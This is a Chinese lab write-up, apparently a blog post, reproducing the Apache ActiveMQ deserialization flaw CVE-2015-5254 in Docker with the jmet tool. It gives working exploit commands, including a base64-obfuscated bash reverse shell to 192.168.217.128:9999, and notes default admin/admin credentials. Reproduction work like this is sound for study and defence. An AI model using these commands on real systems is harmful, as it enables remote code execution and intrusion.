Apache-ActiveMQ 反序列化漏洞(CVE-2015-5254)复现

CVE-2016-3088

一、环境搭建

Java:jdk8
影响版本 Apache ActiveMQ < 5.13.0

二、用docker搭建漏洞环境

访问一下web界面

然后进入admin目录登录

账号:admin

密码:admin

三、工具准备

  1. cd /opt

  2. wget https://github.com/matthiaskaiser/jmet/releases/download/0.1.0/jmet-0.1.0-all.jar

  3. mkdir external

注意:一定要下载external,否则会报错

四、测试漏洞存在

java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "touch /tmp/sucess" -Yp ROME 8.210.152.234(靶机IP,下图说是自己的ip是错误的) 61616

点击触发命令执行

查看一下目录,发现创建成功

五、getshell

首先借用一个网站对payload进行处理,网址我以前的文章复现有提到。

java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIxNy4xMjgvOTk5OSAwPiYxIA==}|{base64,-d}|{bash,-i}" 192.168.217.128 61616

最后点击它,触发命令执行

如上图所示即反弹shell成功!

相关推荐
五岳25 分钟前
深入研究使用DozerMapper复制List<Ojbect>前后元素类型不一致的问题
java·爬坑
人生在勤,不索何获-白大侠34 分钟前
day15——Java常用API(二):常见算法、正则表达式与异常处理详解
java·算法·正则表达式
Bug退退退12338 分钟前
RabbitMQ 高级特性之消息确认
java·分布式·rabbitmq
云动雨颤1 小时前
Java并发性能优化|读写锁与互斥锁解析
java
ldj20201 小时前
Centos 安装Jenkins
java·linux
hqxstudying2 小时前
Intellij IDEA中Maven的使用
java·maven·intellij-idea
SimonKing2 小时前
拯救大文件上传:一文彻底彻底搞懂秒传、断点续传以及分片上传
java·后端·架构
深栈解码2 小时前
JUC并发编程 内存布局和对象头
java·后端
北方有星辰zz2 小时前
数据结构:栈
java·开发语言·数据结构
Seven972 小时前
一个static关键字引发的线上故障:深度剖析静态变量与配置热更新的陷阱
java